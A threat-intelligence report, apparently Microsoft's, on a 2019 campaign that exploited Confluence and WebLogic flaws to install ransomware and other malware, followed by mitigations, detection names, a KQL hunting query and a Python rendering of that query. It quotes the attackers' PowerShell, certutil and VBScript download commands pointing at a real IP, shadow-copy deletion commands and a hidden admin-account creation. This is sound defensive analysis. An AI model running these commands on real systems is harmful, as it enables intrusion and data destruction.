Confluence and WebLogic abuse

As early as April 10, 2019, unidentified attackers began leveraging new vulnerabilities in popular enterprise applications to deliver a wide variety of malware, including ransomware, coin miners, and remote access tools. These applications are typically deployed on internet-facing servers, making them obvious targets for entry.

The campaign operators used two recently disclosed vulnerabilities to gain access to target networks. First, they used a vulnerability in Atlassian Confluence Server (CVE-2019-3396), a Java-based enterprise collaboration suite. Later, on April 16, they began using a vulnerability in Oracle WebLogic Server (CVE-2019-2725), a Java EE application server.

Due to the variety of implants and delivery methods, coupled with consistent infrastructure and TTPs, we believe that these campaigns were carried out by affiliated but independent operators.

These campaigns mostly impacted organizations in the United States, which is consistent with the distribution of Confluence and WebLogic installs. Intrusions were exacerbated by inadequate security measures, including direct access to vulnerable servers from the internet and non-adherence to the principle of least privilege. In many cases, attackers could have established persistent access, because vulnerable services were running in the context of highly privileged accounts.

Arrival

To initiate the campaigns, attackers first attempted to locate vulnerable instances of Confluence Server or Oracle WebLogic Server. Confluence Server, which is written in Java, typically runs in a Java EE application server environment, such as Apache Tomcat, JBoss, or Oracle WebLogic. Attackers connected from a number of IP addresses, most of which were observed only a few times, although some IP addresses were used consistently over several days.

Malware delivery and installation

Immediately following exploitation, Microsoft observed multiple methods used during the installation phase.

PowerShell wget

Attackers executed the PowerShell “wget” cmdlet (an alias for Invoke-WebRequest) to download a file from a remote location.

cmd.exe /c powershell.exe wget http[:]//188.166.74.218/fox.exe -outfile %TEMP%/fox.exe

This method triggered two behavioral detections: Suspicious behavior by cmd.exe was observed and Suspicious PowerShell commandline.

Certutil.exe abuse

Attackers leveraged unintended functionality in Certutil.exe, a Windows Certificate Services utility, to download a file from a remote location.

certutil.exe -urlcache -split -f http[:]//188.166.74.218/ment.exe C:\Users\\AppData\Local\Temp\2/ment.exe 

This method triggered the detection Use of living-off-the-land binary to run malicious code.

Malicious VBScript

Attackers wrote a malicious Visual Basic script line-by-line using cmd.exe “echo” commands, then executed the script. The VBScript (excerpt shown below) in turn downloaded a file from a remote site.

cmd /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>%tmp%\malicious.vbs  
&@echo objXMLHTTP.open "GET","http[:]//188.166.74.218/office.exe",false>>%tmp%\malicious.vbs
...

This method triggered the detection HTTP object allocation in VBScript.

Post-installation activity

Follow-on activity varied depending on the payload delivered. In some cases, the attackers installed ransomware, including the infamous Gandcrab family as well as a new family dubbed “Sodinokibi”. In these cases, the malware connected to command-and-control endpoints and then conducted expected ransomware activities, such as deleting Volume Shadow Copies and disabling system recovery options:

"cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet  
& bcdedit /set {default} recoveryenabled No
& bcdedit /set {default} bootstatuspolicy ignoreallfailures

In other cases, follow-on activities were not observed, likely because the malware was removed by Windows Defender Antivirus.

Persistence

In most observed intrusions, attackers could have easily set up persistent access because the application server (either WebLogic itself or the platform running Confluence) was running under a privileged account, such as SYSTEM. This presents an extreme risk of compromise to highly-privileged domain accounts whose credentials may be present on the server. Some observed persistence methods included:

  • Installing a web shell on the webserver
  • Installing a cmd.exe-based backdoor
  • Creating new user accounts and adding them to the local administrators group
net  user www Qw112233!! /add 
net localgroup administrators www /add

Because of the variety of implants and delivery methods, coupled with consistent infrastructure and TTPs, Microsoft security researchers believe that the campaigns were carried out by affiliated but independent operators.

Impact

The campaign compromised approximately 700 computers globally, about two-thirds of which were located in the United States, which coincides with the global distribution of Oracle WebLogic Server and Confluence Server installs according to open-source research. Based on this finding, we believe that these attacks were not particularly targeted against any geographic area. We also do not see evidence of targeting by industry vertical.

Mitigations

Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

  • To address exploits related to this threat, mitigate the following vulnerabilities: CVE-2019-2725 and CVE-2019-3396.
  • Check your perimeter firewall and proxy to:
    • Limit access to servers from the internet. In enterprise environments, access to line-of-business web applications should be restricted to VPN users.
    • Restrict servers from making arbitrary connections to the internet. This inhibits malware downloads and command-and-control (C&C) activity.
  • Practice the principle of least privilege. In most cases, it is unnecessary to run Oracle WebLogic Server or platforms running Confluence Server as “SYSTEM” or as an administrator.
  • Maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.
  • Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.

Detection details

Antivirus

Windows Defender Antivirus detects multiple malware components associated with this threat. These components are identified using next-generation antivirus capabilities, including machine learning and behavioral detection, leading to overlapping detections, particularly of first-seen components and polymorphic variants. The detection names are listed here for reference, but related alerts are not actively monitored.

  • Trojan:Win32/Gandcrab
  • Ransom:Win32/Sodinokibi

Endpoint detection and response (EDR)

Alerts with the following titles in the Microsoft Defender Security Center portal can indicate threat activity on your network.

Specific to this threat

  • Ransomware associated with an exploitation campaign

Generic and unmonitored

  • HTTP object allocation in VBScript
  • Suspicious behavior by cmd.exe was observed
  • Suspicious PowerShell commandline
  • Use of living-off-the-land binary to run malicious code

Attack surface reduction rules

These rules can block or audit activity associated with this threat:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion
  • Block JavaScript or VBScript from launching downloaded executable content
  • Block credential stealing from the Windows local security authority subsystem (lsass.exe)
  • Use advanced protection against ransomware

Advanced hunting

The following query can be used to reveal and investigate activity described in this report:

ProcessCreationEvents
| where EventTime >= ago(7d)
| where
    // "Grandparent" process is Oracle WebLogic or some process loading Confluence
    InitiatingProcessParentFileName == "beasvc.exe"
    or InitiatingProcessFileName == "beasvc.exe"
    or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
         Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
(
    FileName in~ ("powershell.exe", "powershell_ise.exe") // PowerShell is spawned
    // Omit known clean processes
    and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
    and ProcessCommandLine !contains "ApplicationNo"
    and ProcessCommandLine !contains "CustomerGroup"
    and ProcessCommandLine !contains "Cosmos"
    and ProcessCommandLine !contains "Unrestricted"
    and
    (
        ProcessCommandLine contains "$" // PowerShell variable declaration
        or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
        or ProcessCommandLine contains "encodedcommand"
        or ProcessCommandLine contains "wget"
        //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
    )
)
or
(
    FileName =~ "cmd.exe" // cmd.exe is spawned
    and ProcessCommandLine contains "@echo"
    and ProcessCommandLine contains ">" // Echoing commands into a file
)
or
(
    FileName =~ "certutil.exe" // CertUtil.exe abuse
    and ProcessCommandLine contains "-split"
    // the "-split" parameter is required to write files to the disk
)
| project
    EventTime,
    InitiatingProcessCreationTime,
    MachineId,
    Grandparent_PID = InitiatingProcessParentId,
    Grandparent = InitiatingProcessParentFileName,
    Parent_Account = InitiatingProcessAccountName,
    Parent_PID = InitiatingProcessId,
    Parent = InitiatingProcessFileName,
    Parent_Commandline = InitiatingProcessCommandLine,
    Child_PID = ProcessId,
    Child = FileName,
    Child_Commandline = ProcessCommandLine
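The same hunting logic as an added, offline-runnable Python example (not the report's own code): it mirrors the query's application-server ancestry filter and its three child-process rules over constructed ProcessCreationEvents-style records, and goes one step further by also flagging the vssadmin shadow-copy deletion described under Post-installation activity, which the query itself does not check. Sample events, IP addresses and file names are constructed for illustration.

```python
# Constructed process-creation events (not from the report), shaped like the
# ProcessCreationEvents columns that the advanced-hunting query reads.
def ev(grandparent, parent, parent_cmd, child, child_cmd):
    return {"InitiatingProcessParentFileName": grandparent, "InitiatingProcessFileName": parent,
            "InitiatingProcessCommandLine": parent_cmd, "FileName": child, "ProcessCommandLine": child_cmd}

SAMPLE_EVENTS = [
    ev("beasvc.exe", "java.exe", "java.exe weblogic.Server", "powershell.exe",
       "powershell.exe wget http://203.0.113.5/fox.exe -outfile C:\\Temp\\fox.exe"),
    ev("beasvc.exe", "java.exe", "java.exe weblogic.Server", "certutil.exe",
       "certutil.exe -urlcache -split -f http://203.0.113.5/ment.exe C:\\Temp\\ment.exe"),
    ev("services.exe", "tomcat8.exe", "tomcat8.exe //confluence", "cmd.exe",
       'cmd /c "@echo Set o=CreateObject("MSXML2.XMLHTTP")>%tmp%\\m.vbs"'),
    ev("beasvc.exe", "java.exe", "java.exe weblogic.Server", "cmd.exe",
       "cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet"),
    ev("beasvc.exe", "java.exe", "java.exe weblogic.Server", "powershell.exe",
       'powershell.exe -c "$r = Get-Content ApplicationNo.csv"'),  # allow-listed in the query
    ev("explorer.exe", "cmd.exe", "cmd.exe", "powershell.exe",
       "powershell.exe -e SQBFAFgA"),  # suspicious, but not spawned under WebLogic/Confluence
]

KNOWN_CLEAN = ("ApplicationNo", "CustomerGroup", "Cosmos", "Unrestricted")

def from_app_server(e):  # grandparent/parent is WebLogic (beasvc.exe) or loads Confluence
    return (e["InitiatingProcessParentFileName"].lower() == "beasvc.exe"
            or e["InitiatingProcessFileName"].lower() == "beasvc.exe"
            or "//confluence" in e["InitiatingProcessCommandLine"].lower())

def classify(e):
    """Return the rule an event trips, or None. KQL 'contains' is case-insensitive."""
    child, cmd = e["FileName"].lower(), e["ProcessCommandLine"]
    low = cmd.lower()
    if child in ("powershell.exe", "powershell_ise.exe"):
        if (low.startswith('powershell.exe -c "get-wmiobject -computername')
                or any(k.lower() in low for k in KNOWN_CLEAN)):
            return None  # known-clean command lines excluded by the query
        if "$" in cmd or "-e " in low or "encodedcommand" in low or "wget" in low:
            return "powershell-download-or-encoded"
    elif child == "cmd.exe" and "@echo" in low and ">" in cmd:
        return "cmd-echo-script-to-file"
    elif child == "certutil.exe" and "-split" in low:
        return "certutil-download"
    elif "vssadmin" in low and "delete shadows" in low:  # added here; not in the page's query
        return "shadow-copy-deletion"
    return None

def hunt(events):  # (rule, child, command line) for events matching ancestry and a rule
    return [(r, e["FileName"], e["ProcessCommandLine"]) for e in events
            for r in [classify(e)] if r and from_app_server(e)]
```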

Indicators

Files (SHA-1)